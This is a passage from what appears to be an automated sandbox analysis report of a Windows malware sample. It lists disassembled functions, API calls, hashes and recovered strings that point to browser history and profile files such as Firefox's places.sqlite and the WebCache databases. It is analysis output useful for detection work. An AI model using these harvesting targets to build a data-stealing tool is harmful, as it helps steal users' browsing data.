                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                            • memset.MSVCRT ref: 00403DDA
                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                            • String ID: Waterfox$Waterfox\Profiles
                            • API String ID: 4039892925-11920434
                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                            Control-flow Graph

                            APIs
                            • memset.MSVCRT ref: 00403E50
                            • memset.MSVCRT ref: 00403E65
                            • memset.MSVCRT ref: 00403E7A
                            • memset.MSVCRT ref: 00403E8F
                            • memset.MSVCRT ref: 00403EA4
                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                            • memset.MSVCRT ref: 00403F6B
                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                            • API String ID: 4039892925-2068335096
                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                            APIs
                            • memset.MSVCRT ref: 00403FE1
                            • memset.MSVCRT ref: 00403FF6
                            • memset.MSVCRT ref: 0040400B
                            • memset.MSVCRT ref: 00404020
                            • memset.MSVCRT ref: 00404035
                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                            • memset.MSVCRT ref: 004040FC
                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                            • API String ID: 4039892925-3369679110
                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                            • API String ID: 3510742995-2641926074
                            • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                            • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                            APIs
                            • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                            • GetLastError.KERNEL32 ref: 0041847E
                            • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@CreateErrorFileLast
                            • String ID: |A
                            • API String ID: 4200628931-1717621600
                            • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                            • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                            APIs
                              • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                            • memset.MSVCRT ref: 004033B7
                            • memcpy.MSVCRT ref: 004033D0
                            • wcscmp.MSVCRT ref: 004033FC
                            • _wcsicmp.MSVCRT ref: 00403439
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                            • String ID: $0.@
                            • API String ID: 3030842498-1896041820
                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                            APIs
                            • memset.MSVCRT ref: 00403C09
                            • memset.MSVCRT ref: 00403C1E
                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                            • wcscat.MSVCRT ref: 00403C47
                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • wcscat.MSVCRT ref: 00403C70
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                            • API String ID: 1534475566-1174173950
                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                            • String ID:
                            • API String ID: 669240632-0
                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                            APIs
                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • memset.MSVCRT ref: 00414C87
                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • wcscpy.MSVCRT ref: 00414CFC
                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                            • API String ID: 2925649097-2036018995
                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                            APIs
                            • wcschr.MSVCRT ref: 00414458
                            • _snwprintf.MSVCRT ref: 0041447D
                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                            • String ID: "%s"
                            • API String ID: 1343145685-3297466227
                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                            APIs
                            • memset.MSVCRT ref: 004087D6
                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                            • memset.MSVCRT ref: 00408828
                            • memset.MSVCRT ref: 00408840
                            • memset.MSVCRT ref: 00408858
                            • memset.MSVCRT ref: 00408870
                            • memset.MSVCRT ref: 00408888
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                            • String ID:
                            • API String ID: 2911713577-0
                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID: @ $SQLite format 3
                            • API String ID: 1475443563-3708268960
                            • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                            • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _wcsicmpqsort
                            • String ID: /nosort$/sort
                            • API String ID: 1579243037-1578091866
                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                            APIs
                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleModuleProcessTimes
                            • String ID: GetProcessTimes$kernel32.dll
                            • API String ID: 116129598-3385500049
                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                            APIs
                            • memset.MSVCRT ref: 0040E60F
                            • memset.MSVCRT ref: 0040E629
                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            Strings
                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                            • API String ID: 2887208581-2114579845
                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                            APIs
                            • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                            • LockResource.KERNEL32(00000000), ref: 004148EF
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Resource$FindLoadLockSizeof
                            • String ID:
                            • API String ID: 3473537107-0
                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@
                            • String ID:
                            • API String ID: 613200358-0
                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                            APIs
                            Strings
                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset
                            • String ID: only a single result allowed for a SELECT that is part of an expression
                            • API String ID: 2221118986-1725073988
                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID: $$8
                            • API String ID: 1475443563-435121686
                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                            APIs
                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                              • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                              • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                              • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                              • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                            • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                              • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                            • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                            • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                              • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                            • String ID:
                            • API String ID: 2722907921-0
                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                            APIs
                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                            • memset.MSVCRT ref: 00403A55
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                            • String ID: history.dat$places.sqlite
                            • API String ID: 3093078384-467022611
                            • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                            • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                            APIs
